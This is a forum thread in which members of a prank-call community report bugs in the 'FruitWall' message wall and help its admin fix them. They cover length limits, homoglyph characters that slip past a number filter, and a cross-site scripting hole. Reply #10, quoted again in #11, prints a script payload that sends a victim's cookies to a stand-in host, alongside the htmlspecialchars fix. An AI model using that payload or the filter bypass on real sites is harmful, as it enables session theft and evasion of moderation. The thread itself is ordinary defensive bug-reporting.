Author Topic: Fruit Wall  (Read 5766 times)

Offline Godot

  • Go away, PLA!
  • PLA Corporate Drone
  • *****
  • Posts: 427
  • 1337 13V3L: +34/-7
    • Godot's Website
Fruit Wall
« on: February 04, 2007, 06:43:31 PM »
What happened to the FruitWall?
« Last Edit: February 28, 2009, 12:01:05 PM by rbcp »
"I bought a cactus and it died a week later... I was really depressed, I thought, 'Damn, I am less nurturing than a desert.'" -Demetri Martin

Offline gangals

  • Merp?
  • PLA Nation Citizen
  • *
  • Posts: 1031
  • 1337 13V3L: +68/-31
  • ummm cacti
    • http://img116.imageshack.us/img116/1879/bagmanonfire4pb.jpg
Re: Fruit Wall
« Reply #1 on: February 04, 2007, 07:21:08 PM »
If you look at the logs, someone from 149.9.0.57 has been abusing the wall.

http://phonelosers.org/php/fruitwall_log.html

Offline Raptor

  • OMG MOD wannabe
  • Ninja Phone Loser
  • ***
  • Posts: 1208
  • 1337 13V3L: +80/-52
  • We can be happy underground
Re: Fruit Wall
« Reply #2 on: February 04, 2007, 07:23:33 PM »
If you look at the logs, someone from 149.9.0.57 has been abusing the wall.

http://phonelosers.org/php/fruitwall_log.html

damn, It's a good thing that message didn't end up getting displayed!
Raptor\\\'s Random Reviews!

http://www.phonelosers.org/forums/index.php?board=30.0

Offline rbcp

  • Head Custodian
  • Administrator
  • Ninja Phone Loser
  • *****
  • Posts: 5259
  • 1337 13V3L: +454/-81
  • I'm not stupid! I'm not stupid! Hematology!
    • Homepage
Re: Fruit Wall
« Reply #3 on: February 04, 2007, 08:14:12 PM »
It was displayed last night.  That's when I took it down.  There's a simple line I can add to the perl code of FruitWall to make that not happen anymore, but I've been lazy about it these past couple years.  Once I get around to fixing it, I'll put it back up.

Offline Godot

  • Go away, PLA!
  • PLA Corporate Drone
  • *****
  • Posts: 427
  • 1337 13V3L: +34/-7
    • Godot's Website
Re: Fruit Wall
« Reply #4 on: February 05, 2007, 03:09:49 PM »
Oh, okay. I knew about the bug, but I didn't realize it was being used for abuse. I did post a few messages a while back slightly too long taunting people to try and repost them, just to have some fun, but I did not do anything extreme like that guy.
"I bought a cactus and it died a week later... I was really depressed, I thought, 'Damn, I am less nurturing than a desert.'" -Demetri Martin

Offline Godot

  • Go away, PLA!
  • PLA Corporate Drone
  • *****
  • Posts: 427
  • 1337 13V3L: +34/-7
    • Godot's Website
Re: Fruit Wall
« Reply #5 on: February 11, 2007, 07:42:15 PM »
I just took a look at the FruitWall Perl code. You should be able to fix it by changing the line that reads
Code: [Select]
if ($ENV{'HTTP_REFERER'} =~ "$wallpage") {to
Code: [Select]
if ( ($ENV{'HTTP_REFERER'} =~ "$wallpage") && (length($lalalala) <= 75) ) {.
"I bought a cactus and it died a week later... I was really depressed, I thought, 'Damn, I am less nurturing than a desert.'" -Demetri Martin

Offline rbcp

  • Head Custodian
  • Administrator
  • Ninja Phone Loser
  • *****
  • Posts: 5259
  • 1337 13V3L: +454/-81
  • I'm not stupid! I'm not stupid! Hematology!
    • Homepage
Re: Fruit Wall
« Reply #6 on: February 28, 2009, 12:00:50 PM »
Today I finally wrote a PHP version of FruitWall and put it up on the main page.  Go look, try it out, and please post here if you find a way to hax0r me.  As of now, the "color" and "link" options don't do anything, but I'm going to make those work soon.  I think I've made it so html can't be posted into the form, but we'll see.  I've also banned most numbers since people love posting phone numbers on it.

Offline Godot

  • Go away, PLA!
  • PLA Corporate Drone
  • *****
  • Posts: 427
  • 1337 13V3L: +34/-7
    • Godot's Website
Re: Fruit Wall
« Reply #7 on: February 28, 2009, 12:07:05 PM »
Yeah, you need to set a maximum length. I just set it to "abcdefghijklmnopqrstuvwxyz" repeated a bunch, and it screwed up your whole layout. And this time, put the limit in the PHP code, and not just in the HTML form like you did with the old Fruitwall.
"I bought a cactus and it died a week later... I was really depressed, I thought, 'Damn, I am less nurturing than a desert.'" -Demetri Martin

Offline rbcp

  • Head Custodian
  • Administrator
  • Ninja Phone Loser
  • *****
  • Posts: 5259
  • 1337 13V3L: +454/-81
  • I'm not stupid! I'm not stupid! Hematology!
    • Homepage
Re: Fruit Wall
« Reply #8 on: February 28, 2009, 12:08:56 PM »
Yeah, you need to set a maximum length. I just set it to "abcdefghijklmnopqrstuvwxyz" repeated a bunch, and it screwed up your whole layout. And this time, put the limit in the PHP code, and not just in the HTML form like you did with the old Fruitwall.

Thanks, I'm working on that now.  And I DID put it in the perl code on the old one after a few years of just having it in the form.

Offline rbcp

  • Head Custodian
  • Administrator
  • Ninja Phone Loser
  • *****
  • Posts: 5259
  • 1337 13V3L: +454/-81
  • I'm not stupid! I'm not stupid! Hematology!
    • Homepage
Re: Fruit Wall
« Reply #9 on: February 28, 2009, 12:27:20 PM »
Got the length problem fixed.  Only 80 characters are allowed now.

Next problem?

Offline Godot

  • Go away, PLA!
  • PLA Corporate Drone
  • *****
  • Posts: 427
  • 1337 13V3L: +34/-7
    • Godot's Website
Re: Fruit Wall
« Reply #10 on: February 28, 2009, 01:35:37 PM »
Next problem?

If a user is dumb enough to listen to somebody else who tells him to try to post a certain message to the Fruit Wall, that user could get his cookies stolen, which possibly could give the attacker access to his account.

The victim would be told to enter something like
Code: [Select]
<script>document.location="http://pwn3d.com/c.php?c="+document.cookie;</script> which would send his cookies to whoever runs pwn3d.com.

To fix it, just use htmlspecialchars($forbidden_text) instead of $forbidden_text when you output the "OMG WTF, you can't type..." error message.
"I bought a cactus and it died a week later... I was really depressed, I thought, 'Damn, I am less nurturing than a desert.'" -Demetri Martin

Offline rbcp

  • Head Custodian
  • Administrator
  • Ninja Phone Loser
  • *****
  • Posts: 5259
  • 1337 13V3L: +454/-81
  • I'm not stupid! I'm not stupid! Hematology!
    • Homepage
Re: Fruit Wall
« Reply #11 on: February 28, 2009, 02:25:42 PM »
The victim would be told to enter something like
Code: [Select]
<script>document.location="http://pwn3d.com/c.php?c="+document.cookie;</script> which would send his cookies to whoever runs pwn3d.com.

To fix it, just use htmlspecialchars($forbidden_text) instead of $forbidden_text when you output the "OMG WTF, you can't type..." error message.

Thanks for the tip.  I just made it so it doesn't display what they're not allowed to type anymore.

Also, I decided to take away the ability to post colors or a link.  I had those parts working, but with the link I couldn't figure out a good way to post both the link to change the message and the submitted link.  And colors were just pointless.  I've got it all logging everything with IP addresses now too.

Offline Magus

  • PLA Minion
  • *****
  • Posts: 654
  • 1337 13V3L: +56/-108
  • "The forums token cranky old man." -Jenn
    • sebanderson.com
Re: Fruit Wall
« Reply #12 on: February 28, 2009, 10:59:02 PM »
Check the fruitwall --
I typed this and it worked:


OMG HAX!!! - Οne twο thrее fοur fivе ѕix sеven еight ninе tеn


You might want to ban most characters besides A-Z, underscores, hyphens, etc.

Offline rbcp

  • Head Custodian
  • Administrator
  • Ninja Phone Loser
  • *****
  • Posts: 5259
  • 1337 13V3L: +454/-81
  • I'm not stupid! I'm not stupid! Hematology!
    • Homepage
Re: Fruit Wall
« Reply #13 on: March 01, 2009, 07:46:55 AM »
Check the fruitwall --
I typed this and it worked:


OMG HAX!!! - Οne twο thrее fοur fivе ѕix sеven еight ninе tеn

How'd you do that?  Are you using those crazy ascii codes or something?

Offline Magus

  • PLA Minion
  • *****
  • Posts: 654
  • 1337 13V3L: +56/-108
  • "The forums token cranky old man." -Jenn
    • sebanderson.com
Re: Fruit Wall
« Reply #14 on: March 01, 2009, 10:38:04 AM »
Check the fruitwall --
I typed this and it worked:


OMG HAX!!! - Οne twο thrее fοur fivе ѕix sеven еight ninе tеn

How'd you do that?  Are you using those crazy ascii codes or something?

ASCII = Yes.
It would seem that I'm also 31773 like you hacker folks.
« Last Edit: March 01, 2009, 10:43:06 AM by Magus »